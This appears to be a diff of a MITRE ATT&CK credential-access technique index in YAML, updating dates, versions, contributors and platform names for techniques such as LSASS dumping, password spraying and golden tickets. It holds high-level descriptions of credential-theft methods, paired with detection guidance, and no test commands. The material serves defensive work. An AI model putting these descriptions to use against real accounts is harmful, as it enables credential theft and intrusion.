@@ -45176,12 +45941,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1003.001:
     technique:
-      modified: '2023-12-27T17:57:20.003Z'
+      modified: '2024-08-13T13:52:45.379Z'
       name: 'OS Credential Dumping: LSASS Memory'
       description: |
         Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45218,6 +45982,7 @@ credential-access:
       - Edward Millington
       - Ed Williams, Trustwave, SpiderLabs
       - Olaf Hartong, Falcon Force
+      - Michael Forret, Quorum Cyber
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45230,7 +45995,7 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -45280,12 +46045,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.001
     atomic_tests: []
   T1110.003:
     technique:
-      modified: '2024-03-07T14:33:34.201Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Spraying'
       description: |-
         Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45311,6 +46075,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - John Strand
@@ -45326,18 +46091,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -45364,14 +46129,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.003
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45382,13 +46144,13 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -45402,6 +46164,7 @@ credential-access:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -45412,12 +46175,12 @@ credential-access:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1003.005:
     technique:
-      modified: '2024-04-18T23:47:54.553Z'
+      modified: '2024-10-15T14:18:59.123Z'
       name: 'OS Credential Dumping: Cached Domain Credentials'
       description: "Adversaries may attempt to access cached domain credentials used
         to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -45492,7 +46255,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.005
     atomic_tests: []
   T1558.001:
@@ -45538,7 +46300,7 @@ credential-access:
         url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
         description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
           Retrieved February 27, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-05T16:07:03.779Z'
       name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
       description: "Adversaries who have the KRBTGT account password hash may forge
         Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -45573,16 +46335,14 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.001
     atomic_tests: []
   T1649:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal or Forge Authentication Certificates
       description: |-
-        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
         Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
@@ -45592,21 +46352,23 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Tristan Bennett, Seamless Intelligence
+      - Lee Christensen, SpecterOps
+      - Thirumalai Natarajan, Mandiant
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
-      - Azure AD
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Tristan Bennett, Seamless Intelligence
-      - Lee Christensen, SpecterOps
-      - Thirumalai Natarajan, Mandiant
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -45655,33 +46417,11 @@ credential-access:
         url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1649
     atomic_tests: []
   T1552.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
-      type: attack-pattern
-      created: '2020-02-04T13:02:11.685Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.003
-        url: https://attack.mitre.org/techniques/T1552/003
-      - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        source_name: External to DA, the OS X Way
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:24:04.912Z'
       name: 'Unsecured Credentials: Bash History'
       description: 'Adversaries may search the bash command history on compromised
         systems for insecurely stored credentials. Bash keeps track of the commands
@@ -45696,25 +46436,43 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Monitoring when the user's <code>.bash_history</code> is
         read can help alert to suspicious activity. While users do typically rely
         on their history of commands, they often access this history through other
         utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+      created: '2020-02-04T13:02:11.685Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/003
+        external_id: T1552.003
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.003
     atomic_tests: []
   T1552.001:
     technique:
-      modified: '2024-04-15T21:33:00.213Z'
+      modified: '2024-10-15T14:28:43.639Z'
       name: 'Unsecured Credentials: Credentials In Files'
       description: |-
         Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -45788,7 +46546,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.001
     atomic_tests: []
   T1606.001:
@@ -45850,11 +46607,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1528:
     technique:
-      modified: '2024-03-24T19:41:54.832Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Application Access Token
       description: "Adversaries can steal application access tokens as a means of
         acquiring credentials to access remote systems and resources.\n\nApplication
@@ -45903,6 +46659,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Shailesh Tiwary (Indian Army)
@@ -45911,6 +46668,7 @@ credential-access:
       - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
       - Ram Pliskin, Microsoft Azure Security Center
       - Jack Burns, HubSpot
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -45921,13 +46679,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
-      - Office 365
-      - Azure AD
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.3'
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -45983,44 +46742,11 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1528
     atomic_tests: []
   T1552.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
-      type: attack-pattern
-      created: '2020-02-11T18:43:06.253Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.006
-        url: https://attack.mitre.org/techniques/T1552/006
-      - source_name: Microsoft GPP 2016
-        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
-        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
-          March 9, 2020.
-      - url: https://msdn.microsoft.com/library/cc422924.aspx
-        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
-          11, 2018.
-        source_name: Microsoft GPP Key
-      - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
-        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
-          Retrieved April 11, 2018.
-        source_name: Obscuresecurity Get-GPPPassword
-      - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
-          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
-        url: https://adsecurity.org/?p=2288
-        source_name: ADSecurity Finding Passwords in SYSVOL
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-08-15T13:21:22.734Z'
       name: 'Unsecured Credentials: Group Policy Preferences'
       description: |
         Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46037,25 +46763,54 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
         for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
         and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
         in SYSVOL)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+      created: '2020-02-11T18:43:06.253Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/006
+        external_id: T1552.006
+      - source_name: Obscuresecurity Get-GPPPassword
+        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+          Retrieved April 11, 2018.
+        url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+      - source_name: Microsoft GPP 2016
+        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+          March 9, 2020.
+        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+      - source_name: Microsoft GPP Key
+        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+          11, 2018.
+        url: https://msdn.microsoft.com/library/cc422924.aspx
+      - source_name: ADSecurity Finding Passwords in SYSVOL
+        description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+        url: https://adsecurity.org/?p=2288
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.006
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -46130,11 +46885,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1606:
     technique:
-      modified: '2023-10-15T11:10:03.428Z'
+      modified: '2024-10-15T15:58:23.638Z'
       name: Forge Web Credentials
       description: "Adversaries may forge credential materials that can be used to
         gain access to web applications or Internet services. Web applications and
@@ -46178,11 +46932,10 @@ credential-access:
       - Windows
       - macOS
       - Linux
-      - Azure AD
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -46206,8 +46959,8 @@ credential-access:
         url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
       - source_name: GitHub AWS-ADFS-Credential-Generator
         description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
-          Retrieved December 16, 2020.
-        url: https://github.com/damianh/aws-adfs-credential-generator
+          Retrieved September 27, 2024.
+        url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
@@ -46223,11 +46976,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1621:
     technique:
-      modified: '2024-04-19T04:26:29.365Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication Request Generation
       description: |-
         Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46238,11 +46990,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
       - Pawel Partyka, Microsoft 365 Defender
       - Shanief Webb
       - Obsidian Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
         logs for suspicious events: unusual login attempt source location, mismatch
@@ -46252,16 +47006,16 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
       - IaaS
       - SaaS
-      - Azure AD
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -46299,13 +47053,10 @@ credential-access:
         url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.008:
     technique:
-      modified: '2023-04-11T00:34:00.779Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Chat Messages
       description: |-
         Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46314,6 +47065,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Douglas Weir
       x_mitre_deprecated: false
@@ -46321,11 +47073,11 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -46343,13 +47095,10 @@ credential-access:
         url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1212:
     technique:
-      modified: '2023-10-15T11:45:21.555Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Exploitation for Credential Access
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
@@ -46362,6 +47111,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
       - Mohit Rathore
@@ -46375,12 +47125,13 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      - Azure AD
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Process: Process Creation'
@@ -46412,17 +47163,14 @@ credential-access:
         url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
       - source_name: Microsoft Midnight Blizzard Replay Attack
         description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
-          Retrieved September 27, 2023.
-        url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+          Retrieved September 12, 2024.
+        url: https://x.com/MsftSecIntel/status/1671579359994343425
       - source_name: Technet MS14-068
         description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
           Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
         url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -46495,12 +47243,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1110:
     technique:
-      modified: '2024-01-29T18:53:26.593Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Brute Force
       description: |-
         Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -46509,6 +47256,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - David Fiser, @anu4is, Trend Micro
       - Alfredo Oliveira, Trend Micro
@@ -46527,18 +47275,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
@@ -46562,13 +47310,10 @@ credential-access:
         url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.004:
     technique:
-      modified: '2024-03-07T14:28:02.910Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Credential Stuffing'
       description: |-
         Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -46594,6 +47339,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
